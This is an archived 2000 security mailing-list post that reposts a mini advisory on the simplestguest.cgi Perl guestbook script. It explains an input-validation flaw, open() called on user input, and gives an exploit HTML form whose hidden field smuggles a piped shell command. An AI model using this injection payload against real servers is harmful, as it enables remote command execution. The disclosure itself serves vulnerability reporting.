|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Insecure input validation in simplestmail.cgi
From: suid
SNEAKERZ.ORGDate: Wed Dec 13 2000 - 20:05:46 CST
- Next message: Nsfocus Security Team: "NSFOCUS SA2000-08 : Microsoft IIS for Far East Editions File Disclosure Vulnerability"
- Previous message: Darron Froese: "Re: [ProFTPD] FW: mod_sqlpw Password Caching Bug"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif
Wright.
The whole group of "simplest" cgi's are bad. web developers: dont use them
I didnt really post this because its pretty lame but i looked at a few of these
a while back and heres something i put on my site in feburary. (which used to
be suid.edu and is now www.sneakerz.org/~suid/)
suidsneakerz.org - mini advisory - Tammies Husband Guestbook CGI
Software: simplestguest.cgi
URL: http://www.conservatives.net/atheist/scripts/simplestguest.html
Version: Version 2
Platforms: Unix
Type: Input validation problem
Summary:
Anyone can execute any command on the remote system with
the priveleges of the web server.
Vulnerability:
The perl code does no input validation and performs an
open() on a user supplied input.
Exploit:
Build a HTML form resembling:
<form action=/cgi-bin/simplestguest.cgi method=POST>
<input type=hidden name=required value="NAME">
<input type=hidden name=guestbook
value=" | <command goes here> |">
<input type=hidden name="NAME" value="X">
<input type=submit>
</form>
Of course you could simply send this in a POST request directly
to the web server. Whatever.
http://www.sneakerz.org/~suid/
EOF
- Next message: Nsfocus Security Team: "NSFOCUS SA2000-08 : Microsoft IIS for Far East Editions File Disclosure Vulnerability"
- Previous message: Darron Froese: "Re: [ProFTPD] FW: mod_sqlpw Password Caching Bug"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]